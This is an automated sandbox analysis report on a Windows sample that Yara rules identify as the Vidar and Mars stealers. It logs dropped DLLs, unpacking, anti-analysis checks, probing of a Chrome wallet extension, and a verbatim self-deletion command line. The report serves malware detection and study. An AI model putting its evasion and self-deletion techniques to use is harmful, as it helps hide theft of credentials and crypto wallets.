Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1872701513.000000000F580000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1872701513.000000000F580000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1873689094.000000006096F000.00000002.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1871986947.000000000F04B000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: nss3.dll.0.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);docid INTEGER PRIMARY KEY%z, 'c%d%q'%z, langidCREATE TABLE %Q.'%q_content'(%s)CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);m
Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1873689094.000000006096F000.00000002.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1871986947.000000000F04B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1873689094.000000006096F000.00000002.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1871986947.000000000F04B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1872701513.000000000F580000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1872701513.000000000F580000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr	Binary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1873689094.000000006096F000.00000002.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1871986947.000000000F04B000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1873689094.000000006096F000.00000002.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1871986947.000000000F04B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1873689094.000000006096F000.00000002.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1871986947.000000000F04B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1873689094.000000006096F000.00000002.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1871986947.000000000F04B000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1873689094.000000006096F000.00000002.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1871986947.000000000F04B000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1872701513.000000000F580000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1873689094.000000006096F000.00000002.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1871986947.000000000F04B000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1872701513.000000000F580000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr	Binary or memory string: SELECT ALL id FROM %s;
Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1872701513.000000000F580000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1872701513.000000000F580000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1873689094.000000006096F000.00000002.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1871986947.000000000F04B000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1873689094.000000006096F000.00000002.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1871986947.000000000F04B000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1873689094.000000006096F000.00000002.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1871986947.000000000F04B000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: nss3.dll.0.dr	Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index / path TEXT, / Path to page from root / pageno INTEGER, / Page number / pagetype TEXT, / 'internal', 'leaf' or 'overflow' / ncell INTEGER, / Cells on page (0 for overflow) / payload INTEGER, / Bytes of payload on this page / unused INTEGER, / Bytes of unused space on this page / mx_payload INTEGER, / Largest payload size of all cells / pgoffset INTEGER, / Offset of page in file / pgsize INTEGER, / Size of the page / schema TEXT HIDDEN / Database schema being analyzed */);
Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1872701513.000000000F580000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: nss3.dll.0.dr	Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index / path TEXT, / Path to page from root / pageno INTEGER, / Page number / pagetype TEXT, / 'internal', 'leaf' or 'overflow' / ncell INTEGER, / Cells on page (0 for overflow) / payload INTEGER, / Bytes of payload on this page / unused INTEGER, / Bytes of unused space on this page / mx_payload INTEGER, / Largest payload size of all cells / pgoffset INTEGER, / Offset of page in file / pgsize INTEGER, / Size of the page / schema TEXT HIDDEN / Database schema being analyzed */);/overflow%s%.3x+%.6x%s%.3x/internalleafcorruptedno such schema: %sSELECT 'sqlite_master' AS name, 1 AS rootpage, 'table' AS type UNION ALL SELECT name, rootpage, type FROM "%w".%s WHERE rootpage!=0 ORDER BY namedbstat2018-01-22 18:45:57 0c55d179733b46d8d0ba4d88e01a25e10677046ee3da1d5b1581e86726f2171d:

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:648:120:WilError_03

Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1872701513.000000000F580000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1855026120.00000000006BC000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.0.dr
Source:	Binary string: vcruntime140.i386.pdb source: vcruntime140.dll.0.dr
Source:	Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140.dll.0.dr
Source:	Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.0.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1872701513.000000000F4BD000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.0.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1872701513.000000000F580000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1872701513.000000000F4BD000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.0.dr
Source:	Binary string: msvcp140.i386.pdb source: msvcp140.dll.0.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss3.pdb source: nss3.dll.0.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1855026120.00000000006BC000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.0.dr

Data Obfuscation

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe

Unpacked PE file: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe

Unpacked PE file: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack .bss:W;.data:W;.text:ER;.idata:W;.itext:EW;.edata:EW; vs .text:EW;.rdata:R;.data:W;.reloc:R;Unknown_Section4:EW;

Detected unpacking (creates a PE file in dynamic memory)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe

Unpacked PE file: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.60900000.1.unpack

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	Code function: 0_2_60983000 pushad ; iretd	0_2_60983031
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	Code function: 0_2_60923704 push esp; ret	0_2_60923705
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	Code function: 0_2_6096D990 push eax; ret	0_2_6096D9C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	Code function: 0_2_60922C64 push 83FFFFFDh; ret	0_2_60922C69
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	Code function: 0_2_60911F9E push ecx; mov dword ptr [esp], ebx	0_2_60911FD3
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	Code function: 0_2_60987F71 pushad ; iretd	0_2_60987F74

Source: mozglue.dll.0.dr	Static PE information: section name: .didat
Source: msvcp140.dll.0.dr	Static PE information: section name: .didat

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe

Code function: 0_2_00409220 GetEnvironmentVariableA,lstrcat,lstrcat,lstrcat,SetEnvironmentVariableA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00409220

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Self deletion via cmd or bat file

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	Process created: "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe" & exit
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	Process created: "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe" & exit			Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe

Code function: 0_2_00415FC0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,

0_2_00415FC0

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking mutex)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe

Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess

graph_0-54091

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

graph_0-54084

Contains functionality to detect sleep reduction / modifications

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe

Code function: 0_2_00408370

0_2_00408370

Found evasive API chain (may stop execution after checking computer name)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe

Evasive API call chain: GetComputerName,DecisionNodes,ExitProcess

graph_0-55366

Source: C:\Windows\SysWOW64\timeout.exe TID: 4828

Thread sleep count: 33 > 30

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll			Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll			Jump to dropped file

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe

Code function: 0_2_60920C91 rdtsc

0_2_60920C91

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe

Code function: 0_2_00408370

0_2_00408370

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe

Code function: 0_2_6092A5DC sqlite3_os_init,GetSystemInfo,

0_2_6092A5DC

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	Code function: 0_2_00401280 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_00401280
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	Code function: 0_2_00401090 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_00401090
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	Code function: 0_2_0040A150 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0040A150
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	Code function: 0_2_0040B570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,	0_2_0040B570
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	Code function: 0_2_0040B110 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_0040B110
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	Code function: 0_2_00407620 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00407620
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	Code function: 0_2_0040B3A0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0040B3A0

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe

API call chain: ExitProcess graph end node

graph_0-54080

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1855026120.0000000000667000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1855026120.0000000000600000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe

Code function: 0_2_004054F0 VirtualProtect ?,00000004,00000100,00000000

0_2_004054F0

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe

0_2_00409220

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe

Code function: 0_2_00406040 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetSetOptionA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,

0_2_00406040

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe

Code function: 0_2_60920C91 rdtsc

0_2_60920C91

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	Code function: 0_2_0043C04C mov eax, dword ptr fs:[00000030h]	0_2_0043C04C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	Code function: 0_2_00415E60 mov eax, dword ptr fs:[00000030h]	0_2_00415E60
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	Code function: 0_2_00401000 mov eax, dword ptr fs:[00000030h]	0_2_00401000
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	Code function: 0_2_0043C0B2 mov eax, dword ptr fs:[00000030h]	0_2_0043C0B2

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe

Memory protected: page guard

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe" & exit			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 5			Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe

Code function: GetProcessHeap,RtlAllocateHeap,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,wsprintfA,wsprintfA,memset,LocalFree,

0_2_0040CF60

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe

Code function: 0_2_0040CE40 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,

0_2_0040CE40

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe

Code function: 0_2_0040CEA0 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,

0_2_0040CEA0

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe

Code function: 0_2_004084E0 GetVersionExA,LoadLibraryA,WideCharToMultiByte,lstrlen,WideCharToMultiByte,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,WideCharToMultiByte,lstrcat,lstrcat,lstrcat,WideCharToMultiByte,lstrcat,lstrcat,lstrcat,lstrcat,WideCharToMultiByte,lstrcat,FreeLibrary,

0_2_004084E0

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe

Code function: 0_2_0040CE00 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

0_2_0040CE00

Stealing of Sensitive Information

Yara detected Vidar stealer

Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1854624029.0000000000401000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1855026120.0000000000600000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe PID: 6720, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Yara detected Mars stealer

Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1854624029.0000000000401000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1854693658.000000000043E000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1854680983.000000000043C000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY

Tries to steal Crypto Currency Wallets

